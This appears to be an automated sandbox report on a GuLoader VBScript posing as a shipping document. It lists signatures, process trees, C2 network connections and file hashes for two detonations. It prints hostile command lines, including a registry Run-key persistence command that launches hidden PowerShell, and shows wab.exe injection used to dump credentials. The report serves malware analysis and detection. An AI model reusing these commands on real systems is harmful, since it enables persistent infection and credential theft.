Malware Analysis Report

2024-10-18 23:09

Sample ID: 240521-r44jnahe42
Target: 21052024_1445_Shipping Document.vbs
SHA256: 5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66
Tags: persistence, guloader, collection, downloader
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: 5b18edcdf179f15d71defecce070f15b472cb8e2f41f57ef771059f3d0571e66

Threat Level: Known bad

The file 21052024_1445_Shipping Document.vbs was found to be: Known bad.

Malicious Activity Summary

persistence guloader collection downloader

Guloader,Cloudeye

NirSoft WebBrowserPassView

NirSoft MailPassView

Nirsoft

Blocklisted process makes network request

Checks computer location settings

Adds Run key to start application

Accesses Microsoft Outlook accounts

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Runs ping.exe

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Modifies registry key

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-05-21 14:45

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-05-21 14:45
Reported: 2024-05-21 14:48
Platform: win7-20240508-en
Max time kernel: 150s
Max time network: 150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21052024_1445_Shipping Document.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-268080393-3149932598-1824759070-1000\Software\Microsoft\Windows\CurrentVersion\Run\Antodontalgic = "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\\Sojaskraaets\\').Afdryp;%Peritenon% ($Intermorainic)" C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2672 set thread context of 1320 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2972 wrote to memory of 1592 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 1592 wrote to memory of 2184 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 2972 wrote to memory of 2128 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 2800 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2128 wrote to memory of 2672 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2672 wrote to memory of 2552 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2672 wrote to memory of 1320 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1320 wrote to memory of 2768 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 2768 wrote to memory of 2872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21052024_1445_Shipping Document.vbs"

C:\Windows\System32\cmd.exe

cmd.exe /c ping 6777.6777.6777.677e

C:\Windows\system32\PING.EXE

ping 6777.6777.6777.677e

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"

Network

Country Destination Domain Proto
US 8.8.8.8:53 6777.6777.6777.677e udp
US 8.8.8.8:53 madibarohilalatwo.duckdns.org udp
DE 84.247.187.12:80 madibarohilalatwo.duckdns.org tcp
US 8.8.8.8:53 cadenaderegalos.com udp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 198.49.68.125:443 cadenaderegalos.com tcp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XWS8BUWVGIW67HF3TBJR.temp

MD5 66d985eb027b5bd8ea22c6fdc91246b9
SHA1 a7bf7fe0725a3fe299f3d4efb1699ea288bde3a2
SHA256 ccee5f4135c12fd0afdf18341162d3f475196c3e09752d12a0b82a3524b37c65
SHA512 68c62a7a48e7be300540911e838104afd02af4dc6e437394f9cbdb1208c6a750d4512d0b764ff71a3ecadd3231ff760f3fdb851c2b3d933497857c571eae8682

C:\Users\Admin\AppData\Roaming\Droh.Lit

MD5 1a958060ba3e3de4653959fe2fd1efd5
SHA1 c5d3a5646dc5920668f1f61c334c7c7d40c888b5
SHA256 268dacbaea80bdf0e4ffcbcf21ce4558988d4c77f2906d571a5a1b9db9dc17ab
SHA512 8ba4e481b0a08940a5423abc5d1e7ffa01e4aa185536af215a43e5d28ee025f5caf5355514b2a13f0565c42796e1bd864104878d79d086a82648b0733929c5d0

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-21 14:45

Reported

2024-05-21 14:48

Platform

win10v2004-20240508-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21052024_1445_Shipping Document.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Program Files (x86)\windows mail\wab.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Antodontalgic = "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\\Sojaskraaets\\').Afdryp;%Peritenon% ($Intermorainic)" C:\Windows\SysWOW64\reg.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5064 wrote to memory of 2276 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2276 wrote to memory of 3040 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 5064 wrote to memory of 1556 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1556 wrote to memory of 2644 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1556 wrote to memory of 4900 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 4900 wrote to memory of 636 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 4900 wrote to memory of 2160 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2160 wrote to memory of 1576 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Windows\SysWOW64\cmd.exe
PID 1576 wrote to memory of 4276 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2160 wrote to memory of 4924 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2160 wrote to memory of 2256 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2160 wrote to memory of 1204 N/A C:\Program Files (x86)\windows mail\wab.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21052024_1445_Shipping Document.vbs"

C:\Windows\System32\cmd.exe

cmd.exe /c ping 6777.6777.6777.677e

C:\Windows\system32\PING.EXE

ping 6777.6777.6777.677e

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Droh.Lit && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"

C:\Windows\SysWOW64\reg.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Antodontalgic" /t REG_EXPAND_SZ /d "%Peritenon% -w 1 $Intermorainic=(Get-ItemProperty -Path 'HKCU:\Sojaskraaets\').Afdryp;%Peritenon% ($Intermorainic)"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ckqp"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nevhszl"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xgiatrwwao"

Network


Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3q0im1hw.zzu.ps1

C:\Users\Admin\AppData\Roaming\Droh.Lit

C:\Users\Admin\AppData\Local\Temp\ckqp
